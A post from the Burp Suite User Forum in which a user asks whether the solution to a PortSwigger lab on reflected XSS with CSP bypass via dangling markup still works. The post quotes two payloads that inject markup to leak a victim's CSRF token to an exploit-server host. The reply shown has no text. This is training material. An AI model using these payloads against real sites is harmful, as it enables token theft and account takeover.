The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab Reflected XSS protected by CSP, with dangling markup attack

Taib | Last updated: Feb 14, 2022 09:03AM UTC

Hello there could you verify that the solution of this lab is still working ? https://portswigger.net/web-security/cross-site-scripting/content-security-policy/lab-csp-with-dangling-markup-attack i tried both of thease payloads to get the victims csrf using colaborator and the exploit server none is working script 1 <body> <script> let form = document.createElement('form'); form.action='https://ac621fc21f9c8335c0cf1e9f00610001.web-security-academy.net/my-account'; let input = document.createElement('input'); input.name = 'email'; input.value = '"><table background=\'//exploit-ac2a1f6d1f2383cec0621e37015c0015.web-security-academy.net/?'; form.append(input); document.body.appendChild(form); form.submit() </script> </body> script2 : <script> location = 'https://ac621fc21f9c8335c0cf1e9f00610001.web-security-academy.net/my-account/?email=%22%3E%3Ctable%20background=%27//exploit-ac2a1f6d1f2383cec0621e37015c0015.web-security-academy.net?'; </script>

Ben, PortSwigger Agent | Last updated: Feb 15, 2022 05:58PM UTC